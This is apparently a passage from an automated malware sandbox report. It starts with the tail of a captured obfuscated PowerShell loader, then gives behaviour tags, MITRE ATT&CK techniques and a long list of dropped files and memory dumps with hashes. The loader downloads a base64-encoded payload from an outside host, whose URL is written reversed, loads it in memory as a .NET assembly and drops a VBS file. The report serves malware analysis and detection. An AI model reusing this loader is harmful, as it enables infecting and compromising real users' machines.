);$djfnm.dispose();$djfnm = (New-Object Net.WebClient);$djfnm.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $djfnm.DownloadString( $lBCzSg );$huUPX = 'C:\Users\Admin\AppData\Roaming\systemprog.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.sgnitsohlhd/or.strapdetinu.cvm//:sptth' , $huUPX , 'D D1D' ) );};"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5016

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PoWersHEll.EXE.log

Filesize
2KB

MD5
3d086a433708053f9bf9523e1d87a4e8

SHA1
b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

SHA256
6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

SHA512
931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
488B

MD5
81e79cc7898d374482e8dc66a89eed73

SHA1
5bf2fa3be84403bd412985ded906b6697a98e6ba

SHA256
dc18eca51e04492f551519e64cd9217917361bbe7155aa7aa3445a6b21e2aa12

SHA512
2063af4b8553e48364b4fb38609a577cbc52bc5c16141bd3fc2092845a59545e059c38072fbd0552c1760ec9ace0964f5ee348f5ed31e2e7ae7ce7a522832a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
fce0be01662ec6b679fdad02543af03c

SHA1
e189c5a9f77654f96d8a813a260d4fb48b0851a6

SHA256
07b001f80e2f90d71a1bf921c2e13cff4ba358463f3472e254e735cad11e4584

SHA512
688f86eee5ad7f9a87554b6374fe3286e8b94b23ea58b2edaa70caf961eedbf743cba4722451eca07d0c13867d51562817ef12b90010c2299f54604007e795a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\1qpmws4e\1qpmws4e.dll

Filesize
3KB

MD5
b3b36d859c3f4483ccb7a35267baf414

SHA1
ddd890cbb0284a8998dfd32fc10b3db9f8f4122d

SHA256
6cb2dfdd284fc8ab613140451755f66f2279757300f2f6c2155320ebf5c9dd31

SHA512
cda228661fa0e5ad0625e7ff2411f3544249beffaf9f0bfce076cbe409c7325798d8f0939a116a7af0953bf7803e1b7afa9b647204a36c7b6cd4b13417893b99

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9D49.tmp

Filesize
1KB

MD5
88cdaed665a9001ebaf3015c819b08e7

SHA1
2341ad80f7ab5f9ac70c053249ff9cf191579d40

SHA256
c75aaddf66f88aa3d145c9698d99fc86cf0a18f0c16b6a6ab53adcc4ef8936fd

SHA512
6fd3fc83255fa5d6ba2db59f915149cc731c891dc1b3bb000255a2d9b20b747557148136fee8129e9dd059e3ca100a8e23801974b0c42d8c9570ba5ce18d87c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2qvxnrhf.4ob.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\systemprog.vbs

Filesize
505KB

MD5
90ec71dfb2e6911ea8d304c6fd353882

SHA1
330fac4a4d5a8c9730615fe52e972bcef45b6794

SHA256
3d0b01a64d8f6eab77026a225527c2fa30208f553a45a203dc440a4f425a6ca7

SHA512
4eb2643d493eeb4897bc03ffcb0154c9cae5d66fc967d0bbb02c57e71a7048d70ee6fdaf53af58fc3f0e725b36ea44ec7bf6671c02cadfe86dbd222c44d2371d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1qpmws4e\1qpmws4e.0.cs

Filesize
477B

MD5
2d97be000bc6ad882ec00a26b067a1b0

SHA1
b923f3101b6393720539ea04de707197d642a900

SHA256
132eac2627aebeb4955ea983db268afed5261094c8dca752a5c69f1de7485ee0

SHA512
ef022c1dd4673de6ceabedde1aa3b63489cf957edc676fa93fde2c79788ba9404ef738ec554ddcdde4578acacd599d2936123d8e1026f1b2aff0838bd1eb1ec6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1qpmws4e\1qpmws4e.cmdline

Filesize
369B

MD5
8f0683e6fedfd3fff14eafe7998c877b

SHA1
e5b9b96ec41bff7f962ffd11b0cff64aeba104b7

SHA256
5870caf90733b03e08e093812425d14234c5f5d6b4ac5814d3477283846463b2

SHA512
88808c5d547dbfb75d471aa05af4d5fefc5564271c9eca42f04bccca58ed8e5ba36f7c86dd1ca1837c544c728b9ca5ec6a8bf76dba430917c5cf559fe4ba4f80

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1qpmws4e\CSCA2B7446F280640AB8F89513E35A4878.TMP

Filesize
652B

MD5
e813d66cc98281ef43e149d9763cec6f

SHA1
8820a258431c5cf4425fcb29daf0a598bbbff810

SHA256
6cd2a74d48187ac4e7e6b0031a8fa6bc50ab117f109ff7d1ace329e3796c609e

SHA512
f9ce514e9836704402bee3225bd97b5f18c50bc90516b35d37d5d1675a741b238ab2f9ded883bd963b4faa86eb6785e8253bcf802103c8d4691abb18012be353

Download Submit
memory/1364-18-0x0000000005A80000-0x0000000005A9E000-memory.dmp

Filesize
120KB

Download
memory/1364-72-0x0000000007F10000-0x00000000084B4000-memory.dmp

Filesize
5.6MB

Download
memory/1364-1-0x0000000002140000-0x0000000002176000-memory.dmp

Filesize
216KB

Download
memory/1364-81-0x0000000071640000-0x0000000071DF0000-memory.dmp

Filesize
7.7MB

Download
memory/1364-2-0x0000000071640000-0x0000000071DF0000-memory.dmp

Filesize
7.7MB

Download
memory/1364-3-0x0000000004E00000-0x0000000005428000-memory.dmp

Filesize
6.2MB

Download
memory/1364-76-0x0000000071640000-0x0000000071DF0000-memory.dmp

Filesize
7.7MB

Download
memory/1364-75-0x000000007164E000-0x000000007164F000-memory.dmp

Filesize
4KB

Download
memory/1364-4-0x0000000071640000-0x0000000071DF0000-memory.dmp

Filesize
7.7MB

Download
memory/1364-19-0x0000000005AD0000-0x0000000005B1C000-memory.dmp

Filesize
304KB

Download
memory/1364-71-0x0000000006E50000-0x0000000006E72000-memory.dmp

Filesize
136KB

Download
memory/1364-5-0x0000000004BC0000-0x0000000004BE2000-memory.dmp

Filesize
136KB

Download
memory/1364-7-0x0000000005430000-0x0000000005496000-memory.dmp

Filesize
408KB

Download
memory/1364-6-0x0000000004D60000-0x0000000004DC6000-memory.dmp

Filesize
408KB

Download
memory/1364-65-0x0000000006040000-0x0000000006048000-memory.dmp

Filesize
32KB

Download
memory/1364-0-0x000000007164E000-0x000000007164F000-memory.dmp

Filesize
4KB

Download
memory/1364-17-0x00000000055B0000-0x0000000005904000-memory.dmp

Filesize
3.3MB

Download
memory/3408-44-0x0000000007470000-0x000000000747A000-memory.dmp

Filesize
40KB

Download
memory/3408-49-0x0000000007760000-0x000000000777A000-memory.dmp

Filesize
104KB

Download
memory/3408-48-0x0000000007650000-0x0000000007664000-memory.dmp

Filesize
80KB

Download
memory/3408-47-0x0000000007640000-0x000000000764E000-memory.dmp

Filesize
56KB

Download
memory/3408-46-0x0000000007610000-0x0000000007621000-memory.dmp

Filesize
68KB

Download
memory/3408-45-0x00000000076A0000-0x0000000007736000-memory.dmp

Filesize
600KB

Download
memory/3408-50-0x0000000007690000-0x0000000007698000-memory.dmp

Filesize
32KB

Download
memory/3408-42-0x0000000007A50000-0x00000000080CA000-memory.dmp

Filesize
6.5MB

Download
memory/3408-43-0x0000000007410000-0x000000000742A000-memory.dmp

Filesize
104KB

Download
memory/3408-29-0x0000000007090000-0x00000000070C2000-memory.dmp

Filesize
200KB

Download
memory/3408-30-0x000000006DF00000-0x000000006DF4C000-memory.dmp

Filesize
304KB

Download
memory/3408-40-0x00000000066A0000-0x00000000066BE000-memory.dmp

Filesize
120KB

Download
memory/3408-41-0x00000000070D0000-0x0000000007173000-memory.dmp

Filesize
652KB

Download